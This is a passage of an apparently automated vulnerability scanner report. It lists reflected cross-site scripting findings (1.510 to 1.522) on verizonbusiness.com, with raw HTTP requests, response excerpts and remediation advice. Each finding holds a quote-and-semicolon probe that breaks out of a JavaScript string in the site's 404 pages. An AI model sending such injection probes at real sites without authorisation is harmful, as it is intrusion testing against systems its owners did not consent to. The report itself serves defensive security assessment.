Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:56:56 GMT
Content-Type: text/html
Content-Length: 40613
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:56:56 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:56:56 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/ieeb07b';0ca71a312dd/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.510. http://www.verizonbusiness.com/ie/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /ie/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cea8d"%3b062b4b2aa2e was submitted in the REST URL parameter 1. This input was echoed as cea8d";062b4b2aa2e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /iecea8d"%3b062b4b2aa2e/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:56:45 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 40613
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:56:46 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:56:45 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
}
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/iecea8d";062b4b2aa2e/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.511. http://www.verizonbusiness.com/in/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /in/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a62fb"%3b248d3b66c9b was submitted in the REST URL parameter 1. This input was echoed as a62fb";248d3b66c9b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ina62fb"%3b248d3b66c9b/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:56:54 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40604
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:56:54 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:56:54 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
}
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/ina62fb";248d3b66c9b/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.512. http://www.verizonbusiness.com/in/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /in/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e8564'%3bbba59984b8c was submitted in the REST URL parameter 1. This input was echoed as e8564';bba59984b8c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ine8564'%3bbba59984b8c/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:57:02 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40604
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:57:02 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:57:02 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/ine8564';bba59984b8c/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.513. http://www.verizonbusiness.com/it/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /it/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 11d0f"%3b009bb24b747 was submitted in the REST URL parameter 1. This input was echoed as 11d0f";009bb24b747 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /it11d0f"%3b009bb24b747/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:57:29 GMT
Content-Type: text/html
Content-Length: 40615
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:57:29 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:57:29 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
}
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/it11d0f";009bb24b747/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.514. http://www.verizonbusiness.com/it/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /it/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f777d'%3b3018be4fc24 was submitted in the REST URL parameter 1. This input was echoed as f777d';3018be4fc24 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /itf777d'%3b3018be4fc24/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:58:00 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40615
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:58:00 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:58:00 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<script type="text/javascript">
var request='/itf777d';3018be4fc24/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.515. http://www.verizonbusiness.com/it/solutions/var/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /it/solutions/var/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8690f"%3b014bb77b145 was submitted in the REST URL parameter 1. This input was echoed as 8690f";014bb77b145 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /it8690f"%3b014bb77b145/solutions/var/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:57:07 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40641
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:57:07 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:57:07 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
}
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/it8690f";014bb77b145/solutions/var/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS
...[SNIP]...

1.516. http://www.verizonbusiness.com/it/solutions/var/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /it/solutions/var/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f10a2'%3b78aa0945588 was submitted in the REST URL parameter 1. This input was echoed as f10a2';78aa0945588 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /itf10a2'%3b78aa0945588/solutions/var/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:57:26 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40643
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:57:26 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:57:26 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<script type="text/javascript">
var request='/itf10a2';78aa0945588/solutions/var/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.517. http://www.verizonbusiness.com/it/solutions/var/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /it/solutions/var/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5c0e3"%3b087dbbe08c2 was submitted in the REST URL parameter 2. This input was echoed as 5c0e3";087dbbe08c2 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /it/solutions5c0e3"%3b087dbbe08c2/var/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:57:37 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 41138
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:57:37 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:57:37 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/it/solutions5c0e3";087dbbe08c2/var/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT
...[SNIP]...

1.518. http://www.verizonbusiness.com/it/solutions/var/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /it/solutions/var/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2f4fd'%3bd5e281ab627 was submitted in the REST URL parameter 2. This input was echoed as 2f4fd';d5e281ab627 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /it/solutions2f4fd'%3bd5e281ab627/var/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:57:56 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 41138
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:57:56 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:57:56 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<script type="text/javascript">
var request='/it/solutions2f4fd';d5e281ab627/var/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.519. http://www.verizonbusiness.com/it/solutions/var/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /it/solutions/var/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6735d"%3bbd8ba6c2fd5 was submitted in the REST URL parameter 3. This input was echoed as 6735d";bd8ba6c2fd5 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /it/solutions/var6735d"%3bbd8ba6c2fd5/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:58:28 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42350
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:58:28 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:58:28 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/it/solutions/var6735d";bd8ba6c2fd5/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.520. http://www.verizonbusiness.com/it/solutions/var/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /it/solutions/var/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload acb99'%3b8e85f015c3d was submitted in the REST URL parameter 3. This input was echoed as acb99';8e85f015c3d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /it/solutions/varacb99'%3b8e85f015c3d/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:58:54 GMT
Content-Type: text/html
Content-Length: 42350
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:58:54 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:58:54 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/it/solutions/varacb99';8e85f015c3d/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.521. http://www.verizonbusiness.com/jp/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /jp/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d3bbe"%3b5e4e2109d00 was submitted in the REST URL parameter 1. This input was echoed as d3bbe";5e4e2109d00 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jpd3bbe"%3b5e4e2109d00/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:58:19 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 48637
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:58:19 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:58:19 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
ch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn=".................................";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/jpd3bbe";5e4e2109d00/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.522. http://www.verizonbusiness.com/jp/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /jp/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 17cec'%3bbf9b3c29f39 was submitted in the REST URL parameter 1. This input was echoed as 17cec';bf9b3c29f39 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jp17cec'%3bbf9b3c29f39/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
